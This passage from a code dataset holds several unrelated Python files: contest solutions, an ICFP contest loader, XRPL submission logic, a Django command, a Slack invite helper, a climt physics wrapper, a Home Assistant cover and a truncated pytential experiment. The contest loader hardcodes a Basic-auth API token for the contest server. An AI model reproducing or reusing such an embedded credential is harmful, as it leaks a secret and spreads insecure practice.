Number of Enclaves.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"32548677554","text":"import sys\r\n\r\nstdin = sys.stdin\r\n\r\nns = lambda : stdin.readline().rstrip()\r\nni = lambda : int(ns())\r\nna = lambda : list(map(int, stdin.readline().split()))\r\n\r\n\r\ndef main():\r\n n = ni()\r\n a = na()\r\n a.sort()\r\n mid = n // 2\r\n if n % 2 == 0:\r\n y = sum(a[mid:])\r\n x = sum(a[:mid])\r\n else:\r\n y = sum(a[mid:])\r\n x = sum(a[:mid])\r\n \r\n print(y**2 + x**2)\r\nmain()","repo_name":"pto8913/KyoPro","sub_path":"CodeForces/CFR 594 div2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41176252689","text":"#!/usr/bin/env python\nimport http.client\nimport json\nimport urllib.request\nimport urllib.parse\nimport ssl\nimport os.path\nimport sys\nfrom point import Pt\nfrom unit import Unit\nimport base64\n\nQUALIFIER_PROBLEM_URL = \"http://icfpcontest.org/problems/problem_{}.json\"\nLOCAL_PATH = \"qualifiers/{}.json\"\n\ndef get_problem_data(i):\n local = LOCAL_PATH.format(i)\n if os.path.exists(local):\n print(\"Loading qualifier {} from local cache...\".format(i), file=sys.stderr)\n with open(local) as f:\n return f.read()\n url = QUALIFIER_PROBLEM_URL.format(i)\n print(\"Loading {}...\".format(url), file=sys.stderr)\n return urllib.request.urlopen(url).read().decode(\"utf8\")\n\ndef get_qualifier_problems(*args):\n if len(args) == 0:\n args = range(24)\n problem_data = []\n for i in args:\n problem_data.append(loader(get_problem_data(i)))\n\n return problem_data\n\ndef submit(data):\n #context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n #context.verify_mode = ssl.CERT_REQUIRED\n #context.load_verify_locations('C:\\\\Users\\\\Matt\\\\cacert.pem')\n h = http.client.HTTPSConnection('davar.icfpcontest.org',443,context=ssl.create_default_context())\n # url_params = urllib.parse.urlencode(json.dumps(data))\n print(\"Submitting: \"+json.dumps(data), file=sys.stderr)\n headers = { 'Content-Type' : 'application/json', \"Authorization\" : 'Basic '+base64.b64encode(b\":lI/jYDtQwdrf4s+SDq6WW91LW5bXpH04ZWhIUI+clxo=\").decode(\"ascii\") }\n h.request('POST', '/teams/77/solutions', json.dumps(data), headers)\n r1 = h.getresponse()\n print(r1.status, r1.reason, file=sys.stderr)\n\ndef loader(input_data):\n data_filthy = json.loads(input_data)\n return cleanse(data_filthy)\n\ndef cleanse(data_filthy):\n data = {}\n data[\"id\"] = data_filthy.get(\"id\", -1)\n data[\"width\"] = data_filthy.get(\"width\", 0)\n data[\"height\"] = data_filthy.get(\"height\", 0)\n data[\"grid\"] = [[0 for x in range(data[\"width\"])] for y in range(data[\"height\"])]\n\n is_valid_point = lambda pt: (pt.x >= 0) and (pt.x < data[\"width\"]) and (pt.y >= 0) and (pt.y < data[\"height\"])\n\n for point in data_filthy.get(\"filled\", []):\n p = Pt(int(point.get(\"x\", -1)), int(point.get(\"y\", -1)))\n assert is_valid_point(p)\n data[\"grid\"][p.y][p.x] = 1\n\n data[\"sourceLength\"] = data_filthy.get(\"sourceLength\", 0)\n data[\"sourceSeeds\"] = data_filthy.get(\"sourceSeeds\", [])\n data[\"units\"] = []\n for unit in data_filthy.get(\"units\"):\n \n assert (\"pivot\" in unit)\n pivot_p = Pt(int(unit[\"pivot\"].get(\"x\", -1)), int(unit[\"pivot\"].get(\"y\", -1)))\n assert is_valid_point(pivot_p)\n\n members = []\n for member in unit.get(\"members\", []):\n member_p = Pt(int(member.get(\"x\", 
-1)), int(member.get("y", -1)))\n            assert is_valid_point(member_p)\n            members.append(member_p)\n        \n        unit = Unit(members, pivot_p, data["width"])\n        data["units"].append(unit)\n\n\n    return data\n    \n    \n","repo_name":"mj1618/icfp2015","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"895428652","text":"\"\"\"High-level reliable submission methods with XRPL transactions.\"\"\"\n\nimport asyncio\n\nfrom typing_extensions import Final\n\nfrom xrpl.asyncio.clients import Client\nfrom xrpl.asyncio.ledger import get_latest_validated_ledger_sequence\nfrom xrpl.asyncio.transaction.ledger import get_transaction_from_hash\nfrom xrpl.asyncio.transaction.main import submit_transaction\nfrom xrpl.constants import XRPLException\nfrom xrpl.models.response import Response\nfrom xrpl.models.transactions.transaction import Transaction\n\n_LEDGER_CLOSE_TIME: Final[int] = 4\n\n\nclass XRPLReliableSubmissionException(XRPLException):\n    \"\"\"General XRPL Reliable Submission Exception.\"\"\"\n\n    pass\n\n\nasync def _wait_for_final_transaction_outcome(\n    transaction_hash: str, client: Client, prelim_result: str\n) -> Response:\n    \"\"\"\n    The core logic of reliable submission. Polls the ledger until the result of the\n    transaction can be considered final, meaning it has either been included in a\n    validated ledger, or the transaction's lastLedgerSequence has been surpassed by the\n    latest ledger sequence (meaning it will never be included in a validated ledger).\n    \"\"\"\n    await asyncio.sleep(_LEDGER_CLOSE_TIME)\n    # new persisted transaction\n\n    # query transaction by hash\n    transaction_response = await get_transaction_from_hash(transaction_hash, client)\n\n    result = transaction_response.result\n    if "validated" in result and result["validated"]:\n        # result is in a validated ledger, outcome is final\n        return transaction_response\n\n    last_ledger_sequence = result["LastLedgerSequence"]\n    latest_ledger_sequence = await get_latest_validated_ledger_sequence(client)\n\n    if last_ledger_sequence > latest_ledger_sequence:\n        # outcome is not yet final\n        return await _wait_for_final_transaction_outcome(\n            transaction_hash, client, prelim_result\n        )\n\n    raise XRPLReliableSubmissionException(\n        f"The latest ledger sequence {latest_ledger_sequence} is greater than the "\n        f"last ledger sequence {last_ledger_sequence} in the transaction. Prelim "\n        f"result: {prelim_result}"\n    )\n\n\nasync def send_reliable_submission(\n    transaction: Transaction, client: Client\n) -> Response:\n    \"\"\"\n    Asynchronously submits a transaction and verifies that it has been included in a\n    validated ledger (or has errored/will not be included for some reason).\n\n    `See Reliable Transaction Submission\n    <https://xrpl.org/reliable-transaction-submission.html>`_\n\n    Note: This cannot be used with a standalone rippled node, because ledgers do not\n    close automatically.\n\n    Args:\n        transaction: the signed transaction to submit to the ledger. 
Requires a\n `last_ledger_sequence` param.\n client: the network client used to submit the transaction to a rippled node.\n\n Returns:\n The response from a validated ledger.\n\n Raises:\n XRPLReliableSubmissionException: if the transaction fails, is malformed, or is\n missing a `last_ledger_sequence` param.\n \"\"\"\n if transaction.last_ledger_sequence is None:\n raise XRPLReliableSubmissionException(\n \"Transaction must have a `last_ledger_sequence` param.\"\n )\n transaction_hash = transaction.get_hash()\n submit_response = await submit_transaction(transaction, client)\n prelim_result = submit_response.result[\"engine_result\"]\n if prelim_result[0:3] == \"tem\":\n raise XRPLReliableSubmissionException(\n submit_response.result[\"engine_result_message\"]\n )\n\n return await _wait_for_final_transaction_outcome(\n transaction_hash, client, prelim_result\n )\n","repo_name":"merlinepedra/XRPL-PYTHON-WALLET","sub_path":"xrpl/asyncio/transaction/reliable_submission.py","file_name":"reliable_submission.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"2252211022","text":"import numpy as np\n# import scipy\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport math\nimport sys\n\nim = Image.open(sys.argv[1])\nim_array = im.load()\nprint(im_array)\n\nwidth = 640\nheight = 448\nsegmented = np.zeros((4,4))\n\nfor h in range(height -1 ):\n for w in range(width -1):\n dif1 = np.linalg.norm(np.array(im_array[w,h]) - np.array([146,142,89]))\n dif2 = np.linalg.norm(np.array(im_array[w,h]) - np.array([151,149,122]))\n if min(dif1, dif2) < 5:\n segmented[math.floor(h/height*4), math.floor(w/width*4)] += 1\n # print(im_array[h, w, :])\nmax = segmented.max()\nsegmented = segmented == max\n\nim_plot = plt.imshow(segmented)\nplt.show(im_plot)\n","repo_name":"rhotter/AOUF","sub_path":"simple_detector.py","file_name":"simple_detector.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30601367821","text":"import json\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom user_tests.models import Test, Task, Question, AnswerOptions\n\n\nclass Command(BaseCommand):\n help = 'Creates list of questions for given task of given test.\\n'\\\n 'It takes six required arguments:\\n'\\\n '--choice_type - takes one of options to estimate questions \\n' \\\n '\\tunique - only one correct choice\\n' \\\n '\\tmultiple - many correct choices\\n' \\\n '\\tby_admin - question is to be estimate by admin\\n' \\\n '--file - takes full name of json file with task data\\n' \\\n '--test - takes test name\\n' \\\n '--time_available - takes available time to pass a test\\n' \\\n '--task - takes task name\\n' \\\n '--evaluation_algorithm - takes if task should be auto appraise'\n\n def add_arguments(self, parser):\n\n parser.add_argument(\n '--choice_type',\n action='store',\n dest='choice_type',\n help='Stores if task contains only one choice questions'\n )\n\n parser.add_argument(\n '--file',\n action='store',\n dest='file',\n help='Stores JSON file of given task'\n )\n\n parser.add_argument(\n '--test',\n action='store',\n dest='test',\n help='Stores test name'\n )\n\n parser.add_argument(\n '--time_available',\n action='store',\n dest='time_available',\n help='Stores available time (number of seconds) to pass test',\n type=int\n )\n\n parser.add_argument(\n 
'--task',\n action='store',\n dest='task',\n help='Stores task name'\n )\n\n parser.add_argument(\n '--evaluation_algorithm',\n required=False,\n action='store',\n dest='evaluation_algorithm',\n help='Stores if task should be auto appraise',\n type=bool\n )\n\n parser.set_defaults(evaluation_algorithm=Task.ALGORITHM_AUTO_APPRAISAL)\n\n def handle(self, *args, **options):\n\n choice_type = options['choice_type']\n file = options['file']\n test = options['test']\n time_available = options['time_available']\n task = options['task']\n evaluation_algorithm = options['evaluation_algorithm']\n\n json_data = open(file).read()\n json_data = json.loads(json_data)\n\n test_object, test_created = Test.objects.get_or_create(\n name=test, time_available=time_available\n )\n task_object, task_created = Task.objects.get_or_create(\n test=test_object, name=task,\n evaluation_algorithm=evaluation_algorithm\n )\n\n for item in json_data:\n\n title = item[\"title\"]\n question = Question.objects.create(text=title, task=task_object)\n\n if choice_type == 'unique':\n true_answers = [i[0] for i in item['choices'] if i[0]]\n if len(true_answers) > 1:\n raise CommandError(\n \"This question should contain only one correct \"\n \"choice\"\n )\n\n for is_correct, text in item[\"choices\"]:\n AnswerOptions.objects.create(\n question=question, text=text, is_correct=is_correct\n )\n","repo_name":"slonidet/volunteer","sub_path":"src/user_tests/management/commands/newtask.py","file_name":"newtask.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"69882648685","text":"import requests\n\nslack_headers = {'content-type': 'application/json'}\n\ndef _invite_user(token, email, headers):\n \"\"\"\n Invite new user to slack team\n :param token: The token of the slack app that will invite the user\n :param email: The email of the user that will be invited\n :param headers: The headers for the http request for slack\n :return: invite the user\n \"\"\"\n invite_user = requests.post(\n 'https://slack.com/api/users.admin.invite?token={0}&email={1}'.format(\n token, email),\n headers=headers)\n return invite_user\n\n\ndef main(token, email):\n \"\"\"\n Doing onboarding process for Slack user\n :param token: The token of the slack app that will invite the user\n :param email: The email of the user that will be invited\n :return:\n \"\"\"\n invite_user = _invite_user(token, email, slack_headers)\n return invite_user\n","repo_name":"yuvalman/gigaspaces-onboarding","sub_path":"slack_onboarding.py","file_name":"slack_onboarding.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71011751404","text":"from ..._core import ensure_contiguous_state\nfrom sympl import Stepper, get_constant\nimport logging\ntry:\n from . import _simple_physics as phys\nexcept ImportError as error:\n logging.warning(\n 'Import failed. 
Simple Physics is likely not compiled and will not be '\n        'available.'\n    )\n    print(error)\n\n\nclass SimplePhysics(Stepper):\n    \"\"\"\n    Interface to the simple physics package.\n\n    Reed and Jablonowski 2012:\n    title = {Idealized tropical cyclone simulations of intermediate complexity: a test case for {AGCMs}}\n    journal = {Journal of Advances in Modeling Earth Systems}\n\n    \"\"\"\n\n    input_properties = {\n        'air_temperature': {\n            'dims': ['mid_levels', '*'],\n            'units': 'degK',\n        },\n        'air_pressure': {\n            'dims': ['mid_levels', '*'],\n            'units': 'Pa',\n        },\n        'air_pressure_on_interface_levels': {\n            'dims': ['interface_levels', '*'],\n            'units': 'Pa',\n        },\n        'surface_air_pressure': {\n            'dims': ['*'],\n            'units': 'Pa',\n        },\n        'surface_temperature': {\n            'dims': ['*'],\n            'units': 'degK',\n        },\n        'specific_humidity': {\n            'dims': ['mid_levels', '*'],\n            'units': 'kg/kg',\n        },\n        'northward_wind': {\n            'dims': ['mid_levels', '*'],\n            'units': 'm s^-1',\n        },\n        'eastward_wind': {\n            'dims': ['mid_levels', '*'],\n            'units': 'm s^-1',\n        },\n        'surface_specific_humidity': {\n            'dims': ['*'],\n            'units': 'kg/kg',\n        },\n        'latitude': {\n            'dims': ['*'],\n            'units': 'degrees_north',\n        }\n    }\n\n    diagnostic_properties = {\n        'stratiform_precipitation_rate': {\n            'dims': ['*'],\n            'units': 'm s^-1',\n        },\n        'surface_upward_latent_heat_flux': {\n            'dims': ['*'],\n            'units': 'W m^-2',\n        },\n        'surface_upward_sensible_heat_flux': {\n            'dims': ['*'],\n            'units': 'W m^-2',\n        },\n    }\n\n    output_properties = {\n        'air_temperature': {'units': 'degK'},\n        'specific_humidity': {'units': 'kg/kg'},\n        'northward_wind': {'units': 'm s^-1'},\n        'eastward_wind': {'units': 'm s^-1'},\n    }\n\n    def __init__(\n            self,\n            simulate_cyclone=False,\n            large_scale_condensation=True,\n            boundary_layer=True,\n            surface_fluxes=True,\n            use_external_surface_temperature=True,\n            use_external_surface_specific_humidity=False,\n            top_of_boundary_layer=85000.0,\n            boundary_layer_influence_height=20000.0,\n            drag_coefficient_heat_fluxes=0.0011,\n            base_momentum_drag_coefficient=0.0007,\n            wind_dependent_momentum_drag_coefficient=0.000065,\n            maximum_momentum_drag_coefficient=0.002,\n            **kwargs):\n        \"\"\"\n        Args:\n\n            simulate_cyclone (bool):\n                Option indicating whether the package must\n                simulate a tropical cyclone. This was the original test case this\n                physics package was used for.\n                Default value is False.\n\n            large_scale_condensation (bool):\n                Option indicating whether the package\n                must add moisture and heating tendencies due to large scale condensation.\n                Default value is True.\n\n            boundary_layer (bool):\n                Option indicating whether the package must simulate\n                a simple boundary layer. **It is recommended that this option remain True\n                unless another boundary layer component is being used**.\n                Default value is True.\n\n            surface_fluxes (bool):\n                Option indicating whether the package must calculate\n                surface fluxes. **It is recommended that this option remain True unless the\n                fluxes are being calculated by another component**.\n                Default value is True.\n\n            use_external_surface_temperature (bool):\n                Option indicating whether the package\n                must use surface temperature available in the model state.\n                If False, an internally generated surface temperature is used.\n                Default value is True.\n\n            top_of_boundary_layer (float):\n                The nominal top of the boundary layer in :math:`Pa`.\n\n            boundary_layer_influence_height (float):\n                The decay of the influence of the boundary layer above\n                :code:`top_of_boundary_layer` in :math:`Pa`. 
The influence\n reduces to :math:`1/e` times the boundary layer value at\n a pressure given by :code:`top_of_boundary_layer+boundary_layer_influence_height`.\n\n drag_coefficient_heat_fluxes (float):\n The wind speed independent drag coefficient for latent and sensible\n heat fluxes.\n\n base_momentum_drag_coefficient (float):\n The minimum drag coefficient for winds.\n\n wind_dependent_momentum_drag_coefficient (float):\n The part of the momentum drag coefficient that depends on the surface wind\n speed. The total drag coefficient is given by\n :code:`base_momentum_drag_coefficient + wind_dependent_momentum_drag_coefficient*u_base`,\n where :code:`u_base` is the surface wind speed.\n\n maximum_momentum_drag_coefficient (float):\n This drag coefficient is used for surface wind speeds exceeding :math:`20 m/s`.\n \"\"\"\n\n self._cyclone = simulate_cyclone\n self._lsc = large_scale_condensation\n self._pbl = boundary_layer\n self._surface_flux = surface_fluxes\n self._use_ext_ts = use_external_surface_temperature\n self._use_ext_qsurf = use_external_surface_specific_humidity\n\n phys.init_simple_physics(self._cyclone, self._lsc, self._pbl,\n self._surface_flux, self._use_ext_ts,\n self._use_ext_qsurf)\n\n self._Ct = drag_coefficient_heat_fluxes\n self._pbl_top = top_of_boundary_layer\n self._delta_pbl = boundary_layer_influence_height\n self._Cd0 = base_momentum_drag_coefficient\n self._Cd1 = wind_dependent_momentum_drag_coefficient\n self._Cm = maximum_momentum_drag_coefficient\n self._set_fortran_constants()\n super(SimplePhysics, self).__init__(**kwargs)\n\n def _set_fortran_constants(self):\n self._g = get_constant('gravitational_acceleration', 'm/s^2')\n self._Cpd = get_constant('heat_capacity_of_dry_air_at_constant_pressure', 'J/kg/degK')\n self._Rair = get_constant('gas_constant_of_dry_air', 'J/kg/degK')\n self._Rcond = get_constant('gas_constant_of_vapor_phase', 'J/kg/degK')\n self._radius = get_constant('planetary_radius', 'm')\n self._Omega = get_constant('planetary_rotation_rate', 's^-1')\n self._Lv = get_constant('latent_heat_of_condensation', 'J/kg')\n self._rho_condensible = get_constant('density_of_liquid_water', 'kg/m^3')\n phys.set_physical_constants(self._g, self._Cpd, self._Rair, self._Lv,\n self._Rcond, self._radius, self._Omega,\n self._rho_condensible, self._pbl_top,\n self._delta_pbl, self._Ct, self._Cd0,\n self._Cd1, self._Cm)\n\n @ensure_contiguous_state\n def array_call(self, state, timestep):\n '''\n Calculate surface and boundary layer tendencies.\n\n Args:\n state (dict):\n The model state dictionary\n\n timestep (timedelta):\n The model timestep\n\n Returns:\n state (dict), diagnostics(dict) :\n\n * The updated model state.\n * diagnostics for Simple Physics\n '''\n self._set_fortran_constants()\n (t_out, u_out, v_out, q_out, precip_out,\n sensible_heat_flux, latent_heat_flux) = phys.get_new_state(\n state['eastward_wind'],\n state['northward_wind'],\n state['air_temperature'],\n state['air_pressure'],\n state['air_pressure_on_interface_levels'],\n state['specific_humidity'],\n state['surface_air_pressure'],\n state['surface_temperature'],\n state['surface_specific_humidity'],\n state['latitude'],\n timestep.total_seconds()\n )\n latent_heat_flux[latent_heat_flux < 0] = 0\n new_state = {\n 'eastward_wind': u_out,\n 'northward_wind': v_out,\n 'air_temperature': t_out,\n 'specific_humidity': q_out,\n }\n diagnostics = {\n 'stratiform_precipitation_rate': precip_out,\n 'surface_upward_sensible_heat_flux': sensible_heat_flux,\n 'surface_upward_latent_heat_flux': 
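# latent heat flux from the simple-physics core; negative values were clipped to zero above\n            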
latent_heat_flux,\n }\n return diagnostics, new_state\n","repo_name":"CliMT/climt","sub_path":"climt/_components/simple_physics/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"19"} +{"seq_id":"37577058","text":"from .somfy_rts import RTSSomfyRollingShutter\nimport voluptuous as vol\n\nfrom pprint import pformat\n\nimport logging\n\nimport homeassistant.helpers.config_validation as config_validation\nfrom homeassistant.components.cover import (\n CoverEntity,\n CoverDeviceClass,\n CoverEntityFeature,\n PLATFORM_SCHEMA,\n STATE_OPEN,\n STATE_CLOSED,\n)\n\nfrom homeassistant.const import CONF_NAME, CONF_IP_ADDRESS, CONF_PORT\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\n\n_LOGGER = logging.getLogger(\"somfy_rts\")\n\n# Validation of the user's configuration\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Required(CONF_NAME): config_validation.string,\n vol.Required(CONF_IP_ADDRESS): config_validation.string,\n vol.Required(CONF_PORT): config_validation.string,\n }\n)\n\n\ndef setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None\n) -> None:\n \"\"\"Set up Somfy RTS rolling shutter.\"\"\"\n _LOGGER.info(pformat(config))\n\n cover = {\n \"name\": config[CONF_NAME],\n \"ip_address\": config[CONF_IP_ADDRESS],\n \"port\": config[CONF_PORT]\n }\n\n add_entities([SomfyRTSCover(cover)])\n\n\nclass SomfyRTSCover(CoverEntity):\n \"\"\"Representation of a Somfy RTS rolling shutter.\"\"\"\n\n def __init__(self, cover):\n \"\"\"Initialize a Somfy RTS rolling shutter.\"\"\"\n _LOGGER.info(pformat(cover))\n self._name = cover.get('name')\n self._ip_address = cover.get('ip_address')\n self._port = cover.get('port')\n self._cover = RTSSomfyRollingShutter(\n self._ip_address,\n self._port,\n self._name\n )\n self._attr_device_class = CoverDeviceClass.SHUTTER\n self._attr_supported_features = (\n CoverEntityFeature.OPEN |\n CoverEntityFeature.CLOSE |\n CoverEntityFeature.STOP\n )\n self._state = None\n\n def open_cover(self, **kwargs):\n \"\"\"Open the rolling shutter.\"\"\"\n self._cover.up()\n self._state = STATE_OPEN\n\n def close_cover(self, **kwargs):\n \"\"\"Close the rolling shutter.\"\"\"\n self._cover.down()\n self._state = STATE_CLOSED\n\n def stop_cover(self, **kwargs):\n \"\"\"Stop the rolling shutter.\"\"\"\n self._cover.stop()\n self._state = None\n\n @property\n def is_closed(self):\n return self._state is not STATE_OPEN\n\n @property\n def name(self):\n return self._name\n","repo_name":"Vincent-Stragier/rts_covers","sub_path":"homeassistant_custom_component/somfy_rts/cover.py","file_name":"cover.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43516488217","text":"from typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def hasPathSum(self, root: Optional[TreeNode], targetSum: int) -> bool:\n cnt = 0\n mas = []\n\n def helper(tree, cnt, mas):\n if tree:\n cnt += tree.val\n\n if tree.left:\n helper(tree.left, cnt, mas)\n if tree.right:\n helper(tree.right, cnt, mas)\n if not tree.left and not 
tree.right:\n mas.append(cnt)\n\n helper(root, cnt, mas)\n return True if targetSum in mas else False\n\n\nt = TreeNode(val=1, left=TreeNode(val=2, left=TreeNode(val=1)), right=TreeNode(val=4))\ntarget = 5\nresult = Solution().hasPathSum(t, target)\nprint(result)\n","repo_name":"nazarovlex/leetcode","sub_path":"Easy/112. Path Sum.py","file_name":"112. Path Sum.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"339499973","text":"#!/usr/bin/env python3\n\"\"\"Gather experimental data\"\"\"\nimport numpy as np # noqa\nimport numpy.linalg as la # noqa\nimport pyopencl as cl # noqa\nimport pyopencl.clmath # noqa\nimport json\nimport utils\nimport os\nimport gzip\nimport pickle\n\nfrom functools import partial # noqa: F401\nfrom meshmode.mesh.generation import ( # noqa\n ellipse, cloverleaf, NArmedStarfish, drop, n_gon, qbx_peanut,\n WobblyCircle, make_curve_mesh, starfish)\nfrom pytential import bind, sym, norm # noqa\nfrom pytential.qbx.performance import PerformanceModel\nfrom pytools import one\n\n\nimport logging\nimport multiprocessing\n\nlogging.basicConfig(level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\nTARGET_ORDER = 8\nOVSMP_FACTOR = 5\nTCF = 0.9\nQBX_ORDER = 5\nFMM_ORDER = 15\nMESH_TOL = 1e-10\nFORCE_STAGE2_UNIFORM_REFINEMENT_ROUNDS = 1\nSCALED_MAX_CURVATURE_THRESHOLD = 0.8\nMAX_LEAF_REFINE_WEIGHT = 128\nRUNS = 1\nPOOL_WORKERS = min(5, 1 + multiprocessing.cpu_count())\n\nURCHIN_PARAMS = list(range(2, 12, 2))\nTUNING_URCHIN = 6\n# URCHIN_PARAMS = list(range(2, 7, 2))\nDONUT_PARAMS = list(range(1, 6))\n\n\nDEFAULT_LPOT_KWARGS = dict(\n fmm_backend=\"fmmlib\",\n target_association_tolerance=1e-3,\n fmm_order=FMM_ORDER, qbx_order=QBX_ORDER,\n _box_extent_norm=\"l2\",\n _from_sep_smaller_crit=\"static_l2\",\n _well_sep_is_n_away=2,\n _expansions_in_tree_have_extent=True,\n _expansion_stick_out_factor=TCF,\n _max_leaf_refine_weight=MAX_LEAF_REFINE_WEIGHT,\n _from_sep_smaller_min_nsources_cumul=0,\n _use_target_specific_qbx=False,\n performance_model=PerformanceModel(),\n )\n\n\n# {{{ general utils\n\nclass GeometryGetter(object):\n\n def __init__(self, getter, label):\n self.getter = getter\n self.label = label\n\n def __call__(self, queue, lpot_kwargs):\n return self.getter(queue, lpot_kwargs)\n\n\ndef lpot_source_from_mesh(queue, mesh, lpot_kwargs=None):\n from meshmode.discretization import Discretization\n from meshmode.discretization.poly_element import (\n InterpolatoryQuadratureSimplexGroupFactory)\n\n target_order = TARGET_ORDER\n\n pre_density_discr = Discretization(\n queue.context, mesh,\n InterpolatoryQuadratureSimplexGroupFactory(target_order))\n\n refiner_extra_kwargs = {\n \"_force_stage2_uniform_refinement_rounds\": (\n FORCE_STAGE2_UNIFORM_REFINEMENT_ROUNDS),\n \"_scaled_max_curvature_threshold\": (\n SCALED_MAX_CURVATURE_THRESHOLD),\n }\n\n if lpot_kwargs is None:\n lpot_kwargs = DEFAULT_LPOT_KWARGS\n\n from pytential.qbx import QBXLayerPotentialSource\n lpot_source = QBXLayerPotentialSource(\n pre_density_discr, OVSMP_FACTOR*target_order,\n **lpot_kwargs,)\n\n lpot_source, _ = lpot_source.with_refinement(**refiner_extra_kwargs)\n\n return lpot_source\n\n\ndef _urchin_lpot_source(k, queue, lpot_kwargs):\n sph_m = k // 2\n sph_n = k\n\n from meshmode.mesh.generation import generate_urchin\n mesh = generate_urchin(\n order=TARGET_ORDER, m=sph_m, n=sph_n,\n est_rel_interp_tolerance=MESH_TOL)\n\n return lpot_source_from_mesh(queue, mesh, 
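# lpot_kwargs may be None, in which case lpot_source_from_mesh falls back to DEFAULT_LPOT_KWARGS\n                                      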
lpot_kwargs)\n\n\ndef urchin_geometry_getter(k, label=None):\n if label is None:\n label = k\n\n return GeometryGetter(partial(_urchin_lpot_source, k), label)\n\n\ndef replicate_along_axes(mesh, shape, sep_ratio):\n from meshmode.mesh.processing import (\n find_bounding_box, affine_map, merge_disjoint_meshes)\n\n bbox = find_bounding_box(mesh)\n sizes = bbox[1] - bbox[0]\n\n meshes = [mesh]\n\n for i in range(mesh.ambient_dim):\n for j in range(1, shape[i]):\n vec = np.zeros(mesh.ambient_dim)\n vec[i] = j * sizes[i] * (1 + sep_ratio)\n meshes.append(affine_map(mesh, A=None, b=vec))\n\n # FIXME: https://gitlab.tiker.net/inducer/pytential/issues/6\n mesh = merge_disjoint_meshes(meshes, single_group=True)\n meshes = [mesh]\n\n return mesh\n\n\ndef _torus_lpot_source(r_outer, r_inner, n_outer, n_inner, replicant_shape,\n sep_ratio, queue, lpot_kwargs):\n from meshmode.mesh.generation import generate_torus\n mesh = generate_torus(\n r_outer, r_inner,\n n_outer, n_inner,\n order=TARGET_ORDER)\n mesh = replicate_along_axes(mesh, replicant_shape, sep_ratio)\n return lpot_source_from_mesh(queue, mesh, lpot_kwargs)\n\n\ndef torus_geometry_getter(r_outer, r_inner, n_outer, n_inner, label):\n if label is None:\n label = (r_outer, r_inner, n_outer, n_inner)\n\n return GeometryGetter(\n partial(\n _torus_lpot_source,\n r_outer, r_inner,\n n_outer, n_inner,\n (1, 1, 1), 0),\n label)\n\n\ndef donut_geometry_getter(nrows, label=None):\n if label is None:\n label = nrows\n\n getter = partial(_torus_lpot_source, 2, 1, 40, 20, (2, nrows, 1), 0.1)\n return GeometryGetter(getter, label)\n\n\ndef plane_geometry_getter(label=\"plane\"):\n from inteq_tests import plane_lpot_source\n return GeometryGetter(plane_lpot_source, label)\n\n\nPARAMS_DIR = \"params\"\nOUTPUT_DIR = \"raw-data\"\nBVP_OUTPUT_DIR = \"raw-data-bvp\"\n\n\ndef make_output_file(filename, **flags):\n os.makedirs(OUTPUT_DIR, exist_ok=True)\n return open(os.path.join(OUTPUT_DIR, filename), \"w\", **flags)\n\n\ndef make_params_file(filename, **flags):\n os.makedirs(PARAMS_DIR, exist_ok=True)\n return open(os.path.join(PARAMS_DIR, filename), \"w\", **flags)\n\n\ndef load_params(filename, **flags):\n with open(os.path.join(PARAMS_DIR, filename), \"r\", **flags) as outf:\n return json.load(outf, cls=utils.CostResultDecoder)\n\n\ndef output_data(obj, outfile):\n json.dump(obj, outfile, cls=utils.CostResultEncoder, indent=1)\n if hasattr(outfile, \"name\"):\n logger.info(\"Wrote '%s'\", outfile.name)\n\n# }}}\n\n\n# {{{ cost getter\n\ndef get_lpot_cost(which, helmholtz_k, geometry_getter, lpot_kwargs, kind):\n \"\"\"\n Parameters:\n\n which: \"D\" or \"S\"\n kind: \"actual\" or \"model\"\n \"\"\"\n context = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(context)\n\n lpot_source = geometry_getter(queue, lpot_kwargs)\n\n from sumpy.kernel import LaplaceKernel, HelmholtzKernel\n sigma_sym = sym.var(\"sigma\")\n if helmholtz_k == 0:\n k_sym = LaplaceKernel(lpot_source.ambient_dim)\n kernel_kwargs = {}\n else:\n k_sym = HelmholtzKernel(lpot_source.ambient_dim, \"k\")\n kernel_kwargs = {\"k\": helmholtz_k}\n\n if which == \"S\":\n op = sym.S(k_sym, sigma_sym, qbx_forced_limit=+1, **kernel_kwargs)\n elif which == \"D\":\n op = sym.D(k_sym, sigma_sym, qbx_forced_limit=\"avg\", **kernel_kwargs)\n else:\n raise ValueError(\"unknown lpot symbol: '%s'\" % which)\n\n 